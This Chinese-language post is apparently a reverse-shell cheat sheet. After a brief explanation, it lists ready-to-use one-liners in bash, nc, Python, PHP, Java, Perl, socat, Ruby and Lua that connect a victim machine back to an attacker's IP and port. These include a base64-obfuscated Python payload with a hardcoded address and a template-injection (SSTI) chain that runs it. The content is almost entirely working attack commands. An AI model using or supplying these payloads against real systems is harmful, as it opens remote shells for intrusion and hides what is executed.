什么是反弹shell
反弹shell在我看来就是攻击者输入命令,命令在被攻击端执行,并将执行后得到的结果回显到攻击端的过程。
在目前看来似乎主要用在命令执行上,当网页没有直接回显时我们可以使用反弹shell在我们自己服务端对被攻击端执行代码。
关于反弹shell的主要原理我就不在这细讲了。具体的可以看这几篇文章:
panda1g师兄的文章1
panda1g师兄的文章2
K0rz3n师兄的文章1
K0rz3n师兄的文章2
反弹shell的指令
本文仅记录一些反弹shell的指令:
bash反弹shell
bash -i &> /dev/tcp/ip/port 0>&1
&> /dev/tcp/47.236.36.93/2333 0>&1
nc反弹shell
nc支持-e
nc -e /bin/bash ip port
nc不支持-e
由于-e命令太危险,很多nc在安装时就已经把-e命令去掉了.我们可以采用监听两个端口来解决。
攻击机:
nc -l -vv -p port1
nc -l -vv -p port2
受害机:
nc ip port1 |/bin/bash| nc ip port2
python反弹shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("47.103.22.65",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
"
也可以这样写:
python -c "exec(\'aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zICAgICAgOyAgICBob3N0PSIzOS4xMDguMTgwLjE3MSIgICAgICA7ICAgIHBvcnQ9NTY3ODkgICAgICA7ICAgIHM9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pICAgICAgOyAgICBzLmNvbm5lY3QoKGhvc3QscG9ydCkpICAgICAgOyAgICBvcy5kdXAyKHMuZmlsZW5vKCksMCkgICAgICA7ICAgIG9zLmR1cDIocy5maWxlbm8oKSwxKSAgICAgIDsgICAgb3MuZHVwMihzLmZpbGVubygpLDIpICAgICAgOyAgICBwPXN1YnByb2Nlc3MuY2FsbCgiL2Jpbi9iYXNoIik=\'.decode(\'base64\'))"
php反弹shell
PHP -f
$s = fsockopen("ip",port);
exec('/bin/bash -i 0>&3 1>&3 2>&3');
(注意单双引号)
java反弹shell
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/192.168.31.41/8080;
cat <&5 | while read line; do $line 2>&5 >&5; done"] as String[])
p.waitFor()
perl反弹shell
perl -e 'use Socket;$i="192.168.31.41";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
SSTI反弹shell
也可以这样写:
[].__class__.__mro__[-1].__subclasses__()[71].__init__.__globals__['os'].system('python -c "exec(\'aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zICAgICAgOyAgICBob3N0PSIzOS4xMDguMTgwLjE3MSIgICAgICA7ICAgIHBvcnQ9NTY3ODkgICAgICA7ICAgIHM9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pICAgICAgOyAgICBzLmNvbm5lY3QoKGhvc3QscG9ydCkpICAgICAgOyAgICBvcy5kdXAyKHMuZmlsZW5vKCksMCkgICAgICA7ICAgIG9zLmR1cDIocy5maWxlbm8oKSwxKSAgICAgIDsgICAgb3MuZHVwMihzLmZpbGVubygpLDIpICAgICAgOyAgICBwPXN1YnByb2Nlc3MuY2FsbCgiL2Jpbi9iYXNoIik=\'.decode(\'base64\'))"')
socat反弹shell
/tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<你的IP>:<你的端口>
ruby反弹shell
ruby -rsocket -e'f=TCPSocket.open("<你的IP>",<你的端口>).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
不依赖于/bin/sh的shell
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("<你的IP>","<你的端口>");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
如果目标系统运行Windows
ruby -rsocket -e 'c=TCPSocket.new("<你的IP>","<你的端口>");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
lua反弹shell
lua -e "require('socket');require('os');t=socket.tcp();t:connect('<你的IP>','<你的端口>');os.execute('/bin/sh -i <&3 >&3 2>&3');"
